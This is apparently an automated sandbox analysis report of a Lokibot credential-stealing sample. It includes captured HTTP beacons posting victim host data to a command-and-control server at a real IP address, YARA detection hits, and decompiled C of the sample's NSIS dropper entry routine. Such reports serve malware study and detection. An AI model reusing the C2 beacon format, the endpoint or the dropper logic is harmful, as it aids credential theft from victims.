                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.349751194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:29.608133078 CET1090OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:29.636060953 CET1090OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:30.439112902 CET1090INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:29 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.349752194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:31.618849993 CET1091OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:31.647280931 CET1091OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:32.376492023 CET1092INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:31 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.349755194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:35.179306030 CET1115OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:35.207289934 CET1115OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:35.268660069 CET1116INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: U001P56ybm.exe PID: 4640 Parent PID: 2172

                  General

                  Start time:18:22:06
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\U001P56ybm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\U001P56ybm.exe"
                  Imagebase:0x400000
                  File size:301040 bytes
                  MD5 hash:969E2CCFCACF3573DE922D9BCE81E3FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Chronological Activities

                  Analysis Process: U001P56ybm.exe PID: 5684 Parent PID: 4640

                  General

                  Start time:18:22:08
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\U001P56ybm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\U001P56ybm.exe"
                  Imagebase:0x400000
                  File size:301040 bytes
                  MD5 hash:969E2CCFCACF3573DE922D9BCE81E3FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Chronological Activities

                  Disassembly

                  Code Analysis

                  Reset < >

                    Analysis Process: U001P56ybm.exe PID: 4640 Parent PID: 2172 U001P56ybm.exeCOMMON

                    Executed Functions

                    Function 004030E3, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                    Download Yara Rule
                    C-Code - Quality: 83%
                    			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x42ec18 = _t34;
				 *0x42eb64 = E00405C49(8);
				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
				E0040592B("foxdilaoqebdbpxrsdbw Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\U001P56ybm.exe\" ";
				E0040592B(_t96, _t39);
				 *0x42eb60 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\U001P56ybm.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00434001;
				}
				_t44 = CharNextA(E00405449(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405449(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004030AF(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C0B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E00403464();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x42ebf4; // 0x0
											if(__eflags != 0) {
												_t106 = E00405C49(3);
												_t100 = E00405C49(4);
												_t55 = E00405C49(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x42ec0c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E004051EC(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x42eb7c; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
										_v400 = E00403489();
										goto L32;
									}
									_t103 = E00405449(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\hardz\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t101);
										}
										E0040592B(0x42f000, _v396);
										 *0x42f400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x42eb70; // 0x6bfe70
											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x428b90);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\U001P56ybm.exe", 0x428b90, 1) != 0) {
												_push(0);
												_push(0x428b90);
												E00405679();
												_t77 =  *0x42eb70; // 0x6bfe70
												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E0040518B(0x428b90);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x42f400 =  *0x42f400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E00405679();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004054FF(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004030AF(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                    0x004030ef
                    0x004030f3
                    0x004030fb
                    0x004030fd
                    0x00403102
                    0x0040310d
                    0x00403114
                    0x0040311c
                    0x00403126
                    0x0040313c
                    0x0040314c
                    0x00403151
                    0x00403157
                    0x0040315e
                    0x00403171
                    0x00403176
                    0x00403178
                    0x0040317a
                    0x0040317f
                    0x0040317f
                    0x0040318f
                    0x00403195
                    0x004031fe
                    0x004031fe
                    0x00403200
                    0x00403202
                    0x00000000
                    0x00000000
                    0x0040319b
                    0x0040319e
                    0x004031a6
                    0x004031a6
                    0x004031a9
                    0x004031ae
                    0x004031b0
                    0x004031b0
                    0x004031b1
                    0x004031b1
                    0x004031b6
                    0x004031b9
                    0x004031ee
                    0x004031f3
                    0x004031f8
                    0x004031fb
                    0x004031fd
                    0x004031fd
                    0x004031fd
                    0x00000000
                    0x004031bb
                    0x004031bb
                    0x004031bc
                    0x004031bf
                    0x004031c7
                    0x004031ca
                    0x004031cc
                    0x004031cc
                    0x004031cc
                    0x004031ca
                    0x004031cf
                    0x004031d5
                    0x004031dd
                    0x004031e0
                    0x004031e2
                    0x004031e2
                    0x004031e2
                    0x004031e0
                    0x004031e5
                    0x004031ec
                    0x00403206
                    0x00403209
                    0x00403209
                    0x00403212
                    0x00403217
                    0x00403217
                    0x00403222
                    0x00403228
                    0x0040322d
                    0x0040322f
                    0x00403251
                    0x00403256
                    0x0040325d
                    0x00403264
                    0x00403268
                    0x004032cf
                    0x004032cf
                    0x004032d4
                    0x004032de
                    0x004033c9
                    0x004033cf
                    0x004033da
                    0x004033e3
                    0x004033e5
                    0x004033ea
                    0x004033ec
                    0x004033ee
                    0x004033f0
                    0x004033f2
                    0x004033f4
                    0x004033f6
                    0x00403406
                    0x00403408
                    0x0040340a
                    0x00403417
                    0x00403426
                    0x0040342e
                    0x00403436
                    0x00403436
                    0x0040340a
                    0x004033f6
                    0x004033f2
                    0x0040343b
                    0x00403441
                    0x00403443
                    0x00403447
                    0x00403447
                    0x00403443
                    0x0040344c
                    0x00403451
                    0x00403454
                    0x00403456
                    0x00403456
                    0x0040345e
                    0x0040345e
                    0x004032ed
                    0x004032f4
                    0x004032f4
                    0x0040326a
                    0x00403270
                    0x004032bf
                    0x004032bf
                    0x004032cb
                    0x00000000
                    0x004032cb
                    0x00403279
                    0x00403286
                    0x0040327d
                    0x00403283
                    0x00000000
                    0x00000000
                    0x00403285
                    0x00403285
                    0x00403285
                    0x0040328a
                    0x0040328c
                    0x00403294
                    0x00403300
                    0x00403305
                    0x00403314
                    0x00000000
                    0x00000000
                    0x00403318
                    0x0040331f
                    0x00403325
                    0x0040332b
                    0x00403333
                    0x00403333
                    0x00403341
                    0x00403348
                    0x00403351
                    0x00403357
                    0x00403357
                    0x00403363
                    0x00403369
                    0x00403373
                    0x00403387
                    0x00403388
                    0x00403389
                    0x0040338e
                    0x0040339a
                    0x004033a0
                    0x004033a7
                    0x004033aa
                    0x004033b0
                    0x004033b0
                    0x004033a7
                    0x004033b4
                    0x004033ba
                    0x004033ba
                    0x004033bd
                    0x004033be
                    0x004033bf
                    0x00000000
                    0x004033bf
                    0x00403296
                    0x00403298
                    0x004032a3
                    0x00000000
                    0x00000000
                    0x004032ab
                    0x004032b6
                    0x004032bb
                    0x00000000
                    0x004032bb
                    0x00403237
                    0x00403243
                    0x00403248
                    0x0040324d
                    0x0040324f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040324f
                    0x00000000
                    0x004031ec
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004031a0
                    0x004031a0
                    0x004031a0
                    0x004031a1
                    0x004031a1
                    0x00000000
                    0x004031a0
                    0x00000000

                    APIs
                    • #17.COMCTL32 ref: 00403102
                    • SetErrorMode.KERNELBASE(00008001), ref: 0040310D
                    • OleInitialize.OLE32(00000000), ref: 00403114
                      • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                      • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                      • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                    • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                      • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,foxdilaoqebdbpxrsdbw Setup,NSIS Error), ref: 00405938
                    • GetCommandLineA.KERNEL32(foxdilaoqebdbpxrsdbw Setup,NSIS Error), ref: 00403151
                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 00403164
                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000020), ref: 0040318F
                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                    • DeleteFileA.KERNELBASE(1033), ref: 00403256
                    • OleUninitialize.OLE32(00000000), ref: 004032D4
                    • ExitProcess.KERNEL32 ref: 004032F4
                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000,00000000), ref: 00403300
                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000,00000000), ref: 0040330C
                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                    • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                    • CopyFileA.KERNEL32(C:\Users\user\Desktop\U001P56ybm.exe,00428B90,00000001), ref: 0040337D
                    • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                    • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                    • ExitProcess.KERNEL32 ref: 0040345E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                    • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\U001P56ybm.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\U001P56ybm.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$foxdilaoqebdbpxrsdbw Setup$~nsu.tmp
                    • API String ID: 2278157092-646936170
                    • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                    • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                    • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                    • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405250, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004054FF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42ebe8 =  *0x42ebe8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E0040592B(0x42afe0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405465(_t72);
					} else {
						lstrcatA(0x42afe0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42afe0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405449( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E0040592B(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
